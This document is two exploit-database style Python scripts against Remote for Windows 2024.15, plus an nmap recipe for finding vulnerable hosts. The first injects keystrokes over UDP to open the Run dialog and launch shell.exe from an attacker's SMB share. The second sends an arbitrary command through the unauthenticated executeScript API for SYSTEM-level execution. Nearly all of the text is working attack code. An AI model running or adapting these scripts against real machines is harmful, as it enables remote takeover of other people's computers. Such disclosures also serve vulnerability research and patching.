# Exploit Title: Remote for Windows 2024.15 - RCE # Date: 2025-05-19 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://rs.ltd # Software Link: https://rs.ltd/latest.php?os=win # Version: 2024.15 # Tested on: Windows 10/11 with Remote for Windows (helper) #!/usr/bin/env python3 ''' Remote for Windows 2024.15 - RCE this rce works when the "ask to grant access for unknown iOS devices" in settings is unchecked # Identification: nmap -p- -T4 --script ssl-cert Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US ''' #!/usr/bin/env python3 import requests from scapy.all import IP, UDP, send, Raw import time import urllib3 urllib3.disable_warnings() target = "192.168.8.105" port = 49709 lhost= "192.168.8.101" cmd_string = f"cmd /c \\\\{lhost}\SHARE\shell.exe" print("authenticate..") requests.get(f"https://{target}:{port}/api/authenticate", headers={"X-ClientToken":"random123456"}, verify=False, timeout=2) time.sleep(2) print("running Win+R..") for payload in [b'\x07\x00\x02\x00\x5b\x00\x01', b'\x06\x00\x03\x00\x72\x00', b'\x07\x00\x02\x00\x5b\x00\x00']: send(IP(dst=target)/UDP(dport=port)/Raw(load=payload), verbose=0) time.sleep(2) print("typing the payload..") for char in cmd_string: send(IP(dst=target)/UDP(dport=port)/Raw( load=b'\x06\x00\x03\x00' + char.encode("utf-16le")), verbose=0) time.sleep(5) print("executing..") send(IP(dst=target)/UDP(dport=port)/Raw(b'\x07\x00\x02\x00\x0d\x00\x01'), verbose=0) send(IP(dst=target)/UDP(dport=port)/Raw(b'\x07\x00\x02\x00\x0d\x00\x00'), verbose=0) ------ # Exploit Title: Remote for Windows 2024.15 - unauthenticated RCE # Date: 2025-05-19 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://rs.ltd # Software Link: https://rs.ltd/latest.php?os=win # Version: 2024.15 # Tested on: Windows 10/11 with Remote for Windows (helper) #!/usr/bin/env python3 ''' Remote for Windows 2024.15 - unauthenticated RCE this remote code execution works when the "ask to grant access for unknown iOS devices" in settings is unchecked The Remote for Windows helper service exposes unauthenticated RCE through the executeScript API endpoint. This allows SYSTEM-level command execution via crafted HTTP requests. # Identification: nmap -p- -T4 --script ssl-cert Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US # Usage: # python exploit.py "" # Example: # python exploit.py 192.168.1.100 443 "whoami" ''' #!/usr/bin/env python3 import requests, sys, json from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} ") sys.exit(1) ip, port, cmd = sys.argv[1], sys.argv[2], " ".join(sys.argv[3:]) try: r = requests.get( f"https://{ip}:{port}/api/executeScript", headers={ "X-ClientToken": "1337", "X-HostFullModel": "exploit", "X-HostName": "attacker", "X-Script": cmd, "X-ScriptName": "cmd", "X-ScriptDelay": "0" }, verify=False, timeout=10 ) response = json.loads(r.text) print(response.get("result", "").strip()) except Exception as e: print(f"Error: {e}", file=sys.stderr) sys.exit(1)